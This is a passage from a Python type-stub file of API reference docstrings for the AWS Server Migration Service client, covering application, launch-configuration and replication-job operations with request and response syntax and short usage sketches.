:type runOnce: boolean
:param runOnce:
:type licenseType: string
:param licenseType:
The license type to be used for the AMI created by a successful replication run.
:type roleName: string
:param roleName:
The name of the IAM role to be used by the AWS SMS.
:type description: string
:param description:
The description of the replication job.
:type numberOfRecentAmisToKeep: integer
:param numberOfRecentAmisToKeep:
The maximum number of SMS-created AMIs to retain. The oldest will be deleted once the maximum number is reached and a new AMI is created.
:type encrypted: boolean
:param encrypted:
When *true* , the replication job produces encrypted AMIs. See also ``KmsKeyId`` below.
:type kmsKeyId: string
:param kmsKeyId:
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If encrypted is *true* but a KMS key id is not specified, the customer\'s default KMS key for EBS is used.
:rtype: dict
:returns:
"""
pass
def delete_app(self, appId: str = None, forceStopAppReplication: bool = None, forceTerminateApp: bool = None) -> Dict:
"""
Deletes an existing application. Optionally deletes the launched stack associated with the application and all AWS SMS replication jobs for servers in the application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/DeleteApp>`_
**Request Syntax**
::
response = client.delete_app(
appId='string',
forceStopAppReplication=True|False,
forceTerminateApp=True|False
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application to delete.
:type forceStopAppReplication: boolean
:param forceStopAppReplication:
While deleting the application, stop all replication jobs corresponding to the servers in the application.
:type forceTerminateApp: boolean
:param forceTerminateApp:
While deleting the application, terminate the stack corresponding to the application.
:rtype: dict
:returns:
"""
pass
def delete_app_launch_configuration(self, appId: str = None) -> Dict:
"""
Deletes existing launch configuration for an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/DeleteAppLaunchConfiguration>`_
**Request Syntax**
::
response = client.delete_app_launch_configuration(
appId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application associated with the launch configuration.
:rtype: dict
:returns:
"""
pass
def delete_app_replication_configuration(self, appId: str = None) -> Dict:
"""
Deletes existing replication configuration for an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/DeleteAppReplicationConfiguration>`_
**Request Syntax**
::
response = client.delete_app_replication_configuration(
appId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application associated with the replication configuration.
:rtype: dict
:returns:
"""
pass
def delete_replication_job(self, replicationJobId: str) -> Dict:
"""
Deletes the specified replication job.
After you delete a replication job, there are no further replication runs. AWS deletes the contents of the Amazon S3 bucket used to store AWS SMS artifacts. The AMIs created by the replication runs are not deleted.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/DeleteReplicationJob>`_
**Request Syntax**
::
response = client.delete_replication_job(
replicationJobId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type replicationJobId: string
:param replicationJobId: **[REQUIRED]**
The identifier of the replication job.
:rtype: dict
:returns:
"""
pass
def delete_server_catalog(self) -> Dict:
"""
Deletes all servers from your server catalog.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/DeleteServerCatalog>`_
**Request Syntax**
::
response = client.delete_server_catalog()
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:rtype: dict
:returns:
"""
pass
def disassociate_connector(self, connectorId: str) -> Dict:
"""
Disassociates the specified connector from AWS SMS.
After you disassociate a connector, it is no longer available to support replication jobs.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/DisassociateConnector>`_
**Request Syntax**
::
response = client.disassociate_connector(
connectorId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type connectorId: string
:param connectorId: **[REQUIRED]**
The identifier of the connector.
:rtype: dict
:returns:
"""
pass
def generate_change_set(self, appId: str = None, changesetFormat: str = None) -> Dict:
"""
Generates a target change set for a currently launched stack and writes it to an Amazon S3 object in the customer’s Amazon S3 bucket.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GenerateChangeSet>`_
**Request Syntax**
::
response = client.generate_change_set(
appId='string',
changesetFormat='JSON'|'YAML'
)
**Response Syntax**
::
{
's3Location': {
'bucket': 'string',
'key': 'string'
}
}
**Response Structure**
- *(dict) --*
- **s3Location** *(dict) --*
Location of the Amazon S3 object.
- **bucket** *(string) --*
Amazon S3 bucket name.
- **key** *(string) --*
Amazon S3 bucket key.
:type appId: string
:param appId:
ID of the application associated with the change set.
:type changesetFormat: string
:param changesetFormat:
Format for the change set.
:rtype: dict
:returns:
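**Example**
A usage sketch; the application ID is a placeholder, and the generated change set is read back from the ``s3Location`` in the response::
response = client.generate_change_set(
    appId='app-EXAMPLE',
    changesetFormat='YAML'
)
# Bucket and key of the generated change set in Amazon S3.
print(response['s3Location']['bucket'], response['s3Location']['key'])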
"""
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method\'s model.
:returns: The presigned url
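**Example**
A hedged sketch of presigning a call to ``get_app``; whether a presigned URL is useful for a given AWS SMS operation depends on your use case, and the application ID is a placeholder::
url = client.generate_presigned_url(
    ClientMethod='get_app',
    Params={'appId': 'app-EXAMPLE'},
    ExpiresIn=300
)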
"""
pass
def generate_template(self, appId: str = None, templateFormat: str = None) -> Dict:
"""
Generates an Amazon CloudFormation template based on the current launch configuration and writes it to an Amazon S3 object in the customer’s Amazon S3 bucket.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GenerateTemplate>`_
**Request Syntax**
::
response = client.generate_template(
appId='string',
templateFormat='JSON'|'YAML'
)
**Response Syntax**
::
{
's3Location': {
'bucket': 'string',
'key': 'string'
}
}
**Response Structure**
- *(dict) --*
- **s3Location** *(dict) --*
Location of the Amazon S3 object.
- **bucket** *(string) --*
Amazon S3 bucket name.
- **key** *(string) --*
Amazon S3 bucket key.
:type appId: string
:param appId:
ID of the application associated with the Amazon CloudFormation template.
:type templateFormat: string
:param templateFormat:
Format for generating the Amazon CloudFormation template.
:rtype: dict
:returns:
"""
pass
def get_app(self, appId: str = None) -> Dict:
"""
Retrieve information about an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GetApp>`_
**Request Syntax**
::
response = client.get_app(
appId='string'
)
**Response Syntax**
::
{
'appSummary': {
'appId': 'string',
'name': 'string',
'description': 'string',
'status': 'CREATING'|'ACTIVE'|'UPDATING'|'DELETING'|'DELETED'|'DELETE_FAILED',
'statusMessage': 'string',
'replicationStatus': 'READY_FOR_CONFIGURATION'|'CONFIGURATION_IN_PROGRESS'|'CONFIGURATION_INVALID'|'READY_FOR_REPLICATION'|'VALIDATION_IN_PROGRESS'|'REPLICATION_PENDING'|'REPLICATION_IN_PROGRESS'|'REPLICATED'|'DELTA_REPLICATION_IN_PROGRESS'|'DELTA_REPLICATED'|'DELTA_REPLICATION_FAILED'|'REPLICATION_FAILED'|'REPLICATION_STOPPING'|'REPLICATION_STOP_FAILED'|'REPLICATION_STOPPED',
'replicationStatusMessage': 'string',
'latestReplicationTime': datetime(2015, 1, 1),
'launchStatus': 'READY_FOR_CONFIGURATION'|'CONFIGURATION_IN_PROGRESS'|'CONFIGURATION_INVALID'|'READY_FOR_LAUNCH'|'VALIDATION_IN_PROGRESS'|'LAUNCH_PENDING'|'LAUNCH_IN_PROGRESS'|'LAUNCHED'|'DELTA_LAUNCH_IN_PROGRESS'|'DELTA_LAUNCH_FAILED'|'LAUNCH_FAILED'|'TERMINATE_IN_PROGRESS'|'TERMINATE_FAILED'|'TERMINATED',
'launchStatusMessage': 'string',
'launchDetails': {
'latestLaunchTime': datetime(2015, 1, 1),
'stackName': 'string',
'stackId': 'string'
},
'creationTime': datetime(2015, 1, 1),
'lastModified': datetime(2015, 1, 1),
'roleName': 'string',
'totalServerGroups': 123,
'totalServers': 123
},
'serverGroups': [
{
'serverGroupId': 'string',
'name': 'string',
'serverList': [
{
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
]
},
],
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **appSummary** *(dict) --*
Information about the application.
- **appId** *(string) --*
Unique ID of the application.
- **name** *(string) --*
Name of the application.
- **description** *(string) --*
Description of the application.
- **status** *(string) --*
Status of the application.
- **statusMessage** *(string) --*
A message related to the status of the application.
- **replicationStatus** *(string) --*
Replication status of the application.
- **replicationStatusMessage** *(string) --*
A message related to the replication status of the application.
- **latestReplicationTime** *(datetime) --*
Timestamp of the application's most recent successful replication.
- **launchStatus** *(string) --*
Launch status of the application.
- **launchStatusMessage** *(string) --*
A message related to the launch status of the application.
- **launchDetails** *(dict) --*
Details about the latest launch of the application.
- **latestLaunchTime** *(datetime) --*
Latest time this application was launched successfully.
- **stackName** *(string) --*
Name of the latest stack launched for this application.
- **stackId** *(string) --*
Identifier of the latest stack launched for this application.
- **creationTime** *(datetime) --*
Time of creation of this application.
- **lastModified** *(datetime) --*
Timestamp of the application's most recent modification.
- **roleName** *(string) --*
Name of the service role in the customer's account used by AWS SMS.
- **totalServerGroups** *(integer) --*
Number of server groups present in the application.
- **totalServers** *(integer) --*
Number of servers present in the application.
- **serverGroups** *(list) --*
List of server groups belonging to the application.
- *(dict) --*
A logical grouping of servers.
- **serverGroupId** *(string) --*
Identifier of a server group.
- **name** *(string) --*
Name of a server group.
- **serverList** *(list) --*
List of servers belonging to a server group.
- *(dict) --*
Represents a server.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
- **tags** *(list) --*
List of tags associated with the application.
- *(dict) --*
A label that can be assigned to an application.
- **key** *(string) --*
Tag key.
- **value** *(string) --*
Tag value.
:type appId: string
:param appId:
ID of the application whose information is being retrieved.
:rtype: dict
:returns:
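**Example**
A usage sketch that walks the returned server groups; the application ID is a placeholder::
response = client.get_app(appId='app-EXAMPLE')
print(response['appSummary']['status'], response['appSummary']['launchStatus'])
for group in response['serverGroups']:
    for server in group['serverList']:
        print(group['name'], server['serverId'])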
"""
pass
def get_app_launch_configuration(self, appId: str = None) -> Dict:
"""
Retrieves the application launch configuration associated with an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GetAppLaunchConfiguration>`_
**Request Syntax**
::
response = client.get_app_launch_configuration(
appId='string'
)
**Response Syntax**
::
{
'appId': 'string',
'roleName': 'string',
'serverGroupLaunchConfigurations': [
{
'serverGroupId': 'string',
'launchOrder': 123,
'serverLaunchConfigurations': [
{
'server': {
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
'logicalId': 'string',
'vpc': 'string',
'subnet': 'string',
'securityGroup': 'string',
'ec2KeyName': 'string',
'userData': {
's3Location': {
'bucket': 'string',
'key': 'string'
}
},
'instanceType': 'string',
'associatePublicIpAddress': True|False
},
]
},
]
}
**Response Structure**
- *(dict) --*
- **appId** *(string) --*
ID of the application associated with the launch configuration.
- **roleName** *(string) --*
Name of the service role in the customer's account that Amazon CloudFormation uses to launch the application.
- **serverGroupLaunchConfigurations** *(list) --*
List of launch configurations for server groups in this application.
- *(dict) --*
Launch configuration for a server group.
- **serverGroupId** *(string) --*
Identifier of the server group the launch configuration is associated with.
- **launchOrder** *(integer) --*
Launch order of servers in the server group.
- **serverLaunchConfigurations** *(list) --*
Launch configuration for servers in the server group.
- *(dict) --*
Launch configuration for a server.
- **server** *(dict) --*
Identifier of the server the launch configuration is associated with.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
- **logicalId** *(string) --*
Logical ID of the server in the Amazon CloudFormation template.
- **vpc** *(string) --*
Identifier of the VPC the server should be launched into.
- **subnet** *(string) --*
Identifier of the subnet the server should be launched into.
- **securityGroup** *(string) --*
Identifier of the security group that applies to the launched server.
- **ec2KeyName** *(string) --*
Name of the EC2 SSH Key to be used for connecting to the launched server.
- **userData** *(dict) --*
Location of the user-data script to be executed when launching the server.
- **s3Location** *(dict) --*
Amazon S3 location of the user-data script.
- **bucket** *(string) --*
Amazon S3 bucket name.
- **key** *(string) --*
Amazon S3 bucket key.
- **instanceType** *(string) --*
Instance type to be used for launching the server.
- **associatePublicIpAddress** *(boolean) --*
If true, a publicly accessible IP address is created when launching the server.
:type appId: string
:param appId:
ID of the application launch configuration.
:rtype: dict
:returns:
"""
pass
def get_app_replication_configuration(self, appId: str = None) -> Dict:
"""
Retrieves an application replication configuration associated with an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GetAppReplicationConfiguration>`_
**Request Syntax**
::
response = client.get_app_replication_configuration(
appId='string'
)
**Response Syntax**
::
{
'serverGroupReplicationConfigurations': [
{
'serverGroupId': 'string',
'serverReplicationConfigurations': [
{
'server': {
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
'serverReplicationParameters': {
'seedTime': datetime(2015, 1, 1),
'frequency': 123,
'runOnce': True|False,
'licenseType': 'AWS'|'BYOL',
'numberOfRecentAmisToKeep': 123,
'encrypted': True|False,
'kmsKeyId': 'string'
}
},
]
},
]
}
**Response Structure**
- *(dict) --*
- **serverGroupReplicationConfigurations** *(list) --*
Replication configurations associated with server groups in this application.
- *(dict) --*
Replication configuration for a server group.
- **serverGroupId** *(string) --*
Identifier of the server group this replication configuration is associated with.
- **serverReplicationConfigurations** *(list) --*
Replication configuration for servers in the server group.
- *(dict) --*
Replication configuration of a server.
- **server** *(dict) --*
Identifier of the server this replication configuration is associated with.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
- **serverReplicationParameters** *(dict) --*
Parameters for replicating the server.
- **seedTime** *(datetime) --*
Seed time for creating a replication job for the server.
- **frequency** *(integer) --*
Frequency of creating replication jobs for the server.
- **runOnce** *(boolean) --*
- **licenseType** *(string) --*
License type for creating a replication job for the server.
- **numberOfRecentAmisToKeep** *(integer) --*
Number of recent AMIs to keep when creating a replication job for this server.
- **encrypted** *(boolean) --*
When true, the replication job produces encrypted AMIs. See also ``KmsKeyId`` below.
- **kmsKeyId** *(string) --*
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If encrypted is *true* but a KMS key id is not specified, the customer's default KMS key for EBS is used.
:type appId: string
:param appId:
ID of the application associated with the replication configuration.
:rtype: dict
:returns:
"""
pass
def get_connectors(self, nextToken: str = None, maxResults: int = None) -> Dict:
"""
Describes the connectors registered with AWS SMS.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GetConnectors>`_
**Request Syntax**
::
response = client.get_connectors(
nextToken='string',
maxResults=123
)
**Response Syntax**
::
{
'connectorList': [
{
'connectorId': 'string',
'version': 'string',
'status': 'HEALTHY'|'UNHEALTHY',
'capabilityList': [
'VSPHERE'|'SCVMM'|'HYPERV-MANAGER'|'SNAPSHOT_BATCHING',
],
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmManagerId': 'string',
'ipAddress': 'string',
'macAddress': 'string',
'associatedOn': datetime(2015, 1, 1)
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **connectorList** *(list) --*
Information about the registered connectors.
- *(dict) --*
Represents a connector.
- **connectorId** *(string) --*
The identifier of the connector.
- **version** *(string) --*
The connector version.
- **status** *(string) --*
The status of the connector.
- **capabilityList** *(list) --*
The capabilities of the connector.
- *(string) --*
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The VM management product.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **ipAddress** *(string) --*
The IP address of the connector.
- **macAddress** *(string) --*
The MAC address of the connector.
- **associatedOn** *(datetime) --*
The time the connector was associated.
- **nextToken** *(string) --*
The token required to retrieve the next set of results. This value is null when there are no more results to return.
:type nextToken: string
:param nextToken:
The token for the next set of results.
:type maxResults: integer
:param maxResults:
The maximum number of results to return in a single call. The default value is 50. To retrieve the remaining results, make another call with the returned ``NextToken`` value.
:rtype: dict
:returns:
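**Example**
A sketch of manual pagination using ``nextToken``; real connector IDs and statuses will differ::
connectors = []
kwargs = {'maxResults': 50}
while True:
    page = client.get_connectors(**kwargs)
    connectors.extend(page.get('connectorList', []))
    if not page.get('nextToken'):
        break
    kwargs['nextToken'] = page['nextToken']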
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
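**Example**
A sketch that assumes a paginator is defined for the ``get_replication_jobs`` operation; use ``client.can_paginate('get_replication_jobs')`` to confirm before relying on it::
paginator = client.get_paginator('get_replication_jobs')
for page in paginator.paginate():
    for job in page['replicationJobList']:
        print(job['replicationJobId'], job['state'])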
"""
pass
def get_replication_jobs(self, replicationJobId: str = None, nextToken: str = None, maxResults: int = None) -> Dict:
"""
Describes the specified replication job or all of your replication jobs.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GetReplicationJobs>`_
**Request Syntax**
::
response = client.get_replication_jobs(
replicationJobId='string',
nextToken='string',
maxResults=123
)
**Response Syntax**
::
{
'replicationJobList': [
{
'replicationJobId': 'string',
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'seedReplicationTime': datetime(2015, 1, 1),
'frequency': 123,
'runOnce': True|False,
'nextReplicationRunStartTime': datetime(2015, 1, 1),
'licenseType': 'AWS'|'BYOL',
'roleName': 'string',
'latestAmiId': 'string',
'state': 'PENDING'|'ACTIVE'|'FAILED'|'DELETING'|'DELETED'|'COMPLETED'|'PAUSED_ON_FAILURE'|'FAILING',
'statusMessage': 'string',
'description': 'string',
'numberOfRecentAmisToKeep': 123,
'encrypted': True|False,
'kmsKeyId': 'string',
'replicationRunList': [
{
'replicationRunId': 'string',
'state': 'PENDING'|'MISSED'|'ACTIVE'|'FAILED'|'COMPLETED'|'DELETING'|'DELETED',
'type': 'ON_DEMAND'|'AUTOMATIC',
'stageDetails': {
'stage': 'string',
'stageProgress': 'string'
},
'statusMessage': 'string',
'amiId': 'string',
'scheduledStartTime': datetime(2015, 1, 1),
'completedTime': datetime(2015, 1, 1),
'description': 'string',
'encrypted': True|False,
'kmsKeyId': 'string'
},
]
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **replicationJobList** *(list) --*
Information about the replication jobs.
- *(dict) --*
Represents a replication job.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **seedReplicationTime** *(datetime) --*
The seed replication time.
- **frequency** *(integer) --*
The time between consecutive replication runs, in hours.
- **runOnce** *(boolean) --*
- **nextReplicationRunStartTime** *(datetime) --*
The start time of the next replication run.
- **licenseType** *(string) --*
The license type to be used for the AMI created by a successful replication run.
- **roleName** *(string) --*
The name of the IAM role to be used by the Server Migration Service.
- **latestAmiId** *(string) --*
The ID of the latest Amazon Machine Image (AMI).
- **state** *(string) --*
The state of the replication job.
- **statusMessage** *(string) --*
The description of the current status of the replication job.
- **description** *(string) --*
The description of the replication job.
- **numberOfRecentAmisToKeep** *(integer) --*
Number of recent AMIs to keep in the customer's account for a replication job. By default the value is set to zero, meaning that all AMIs are kept.
- **encrypted** *(boolean) --*
Whether the replication job should produce encrypted AMIs or not. See also ``KmsKeyId`` below.
- **kmsKeyId** *(string) --*
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If encrypted is *true* but a KMS key id is not specified, the customer's default KMS key for EBS is used.
- **replicationRunList** *(list) --*
Information about the replication runs.
- *(dict) --*
Represents a replication run.
- **replicationRunId** *(string) --*
The identifier of the replication run.
- **state** *(string) --*
The state of the replication run.
- **type** *(string) --*
The type of replication run.
- **stageDetails** *(dict) --*
Details of the current stage of the replication run.
- **stage** *(string) --*
String describing the current stage of a replication run.
- **stageProgress** *(string) --*
String describing the progress of the current stage of a replication run.
- **statusMessage** *(string) --*
The description of the current status of the replication job.
- **amiId** *(string) --*
The identifier of the Amazon Machine Image (AMI) from the replication run.
- **scheduledStartTime** *(datetime) --*
The start time of the next replication run.
- **completedTime** *(datetime) --*
The completion time of the last replication run.
- **description** *(string) --*
The description of the replication run.
- **encrypted** *(boolean) --*
Whether the replication run should produce encrypted AMIs. See also ``KmsKeyId`` below.
- **kmsKeyId** *(string) --*
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If encrypted is *true* but a KMS key id is not specified, the customer's default KMS key for EBS is used.
- **nextToken** *(string) --*
The token required to retrieve the next set of results. This value is null when there are no more results to return.
:type replicationJobId: string
:param replicationJobId:
The identifier of the replication job.
:type nextToken: string
:param nextToken:
The token for the next set of results.
:type maxResults: integer
:param maxResults:
The maximum number of results to return in a single call. The default value is 50. To retrieve the remaining results, make another call with the returned ``NextToken`` value.
:rtype: dict
:returns:
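**Example**
A usage sketch listing jobs and their most recent AMI; ``latestAmiId`` may be absent for jobs that have not completed a replication run::
response = client.get_replication_jobs(maxResults=50)
for job in response['replicationJobList']:
    print(job['replicationJobId'], job['state'], job.get('latestAmiId'))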
"""
pass
def get_replication_runs(self, replicationJobId: str, nextToken: str = None, maxResults: int = None) -> Dict:
"""
Describes the replication runs for the specified replication job.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GetReplicationRuns>`_
**Request Syntax**
::
response = client.get_replication_runs(
replicationJobId='string',
nextToken='string',
maxResults=123
)
**Response Syntax**
::
{
'replicationJob': {
'replicationJobId': 'string',
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'seedReplicationTime': datetime(2015, 1, 1),
'frequency': 123,
'runOnce': True|False,
'nextReplicationRunStartTime': datetime(2015, 1, 1),
'licenseType': 'AWS'|'BYOL',
'roleName': 'string',
'latestAmiId': 'string',
'state': 'PENDING'|'ACTIVE'|'FAILED'|'DELETING'|'DELETED'|'COMPLETED'|'PAUSED_ON_FAILURE'|'FAILING',
'statusMessage': 'string',
'description': 'string',
'numberOfRecentAmisToKeep': 123,
'encrypted': True|False,
'kmsKeyId': 'string',
'replicationRunList': [
{
'replicationRunId': 'string',
'state': 'PENDING'|'MISSED'|'ACTIVE'|'FAILED'|'COMPLETED'|'DELETING'|'DELETED',
'type': 'ON_DEMAND'|'AUTOMATIC',
'stageDetails': {
'stage': 'string',
'stageProgress': 'string'
},
'statusMessage': 'string',
'amiId': 'string',
'scheduledStartTime': datetime(2015, 1, 1),
'completedTime': datetime(2015, 1, 1),
'description': 'string',
'encrypted': True|False,
'kmsKeyId': 'string'
},
]
},
'replicationRunList': [
{
'replicationRunId': 'string',
'state': 'PENDING'|'MISSED'|'ACTIVE'|'FAILED'|'COMPLETED'|'DELETING'|'DELETED',
'type': 'ON_DEMAND'|'AUTOMATIC',
'stageDetails': {
'stage': 'string',
'stageProgress': 'string'
},
'statusMessage': 'string',
'amiId': 'string',
'scheduledStartTime': datetime(2015, 1, 1),
'completedTime': datetime(2015, 1, 1),
'description': 'string',
'encrypted': True|False,
'kmsKeyId': 'string'
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **replicationJob** *(dict) --*
Information about the replication job.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **seedReplicationTime** *(datetime) --*
The seed replication time.
- **frequency** *(integer) --*
The time between consecutive replication runs, in hours.
- **runOnce** *(boolean) --*
- **nextReplicationRunStartTime** *(datetime) --*
The start time of the next replication run.
- **licenseType** *(string) --*
The license type to be used for the AMI created by a successful replication run.
- **roleName** *(string) --*
The name of the IAM role to be used by the Server Migration Service.
- **latestAmiId** *(string) --*
The ID of the latest Amazon Machine Image (AMI).
- **state** *(string) --*
The state of the replication job.
- **statusMessage** *(string) --*
The description of the current status of the replication job.
- **description** *(string) --*
The description of the replication job.
- **numberOfRecentAmisToKeep** *(integer) --*
Number of recent AMIs to keep in the customer's account for a replication job. By default the value is set to zero, meaning that all AMIs are kept.
- **encrypted** *(boolean) --*
Whether the replication job should produce encrypted AMIs or not. See also ``KmsKeyId`` below.
- **kmsKeyId** *(string) --*
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If encrypted is *true* but a KMS key id is not specified, the customer's default KMS key for EBS is used.
- **replicationRunList** *(list) --*
Information about the replication runs.
- *(dict) --*
Represents a replication run.
- **replicationRunId** *(string) --*
The identifier of the replication run.
- **state** *(string) --*
The state of the replication run.
- **type** *(string) --*
The type of replication run.
- **stageDetails** *(dict) --*
Details of the current stage of the replication run.
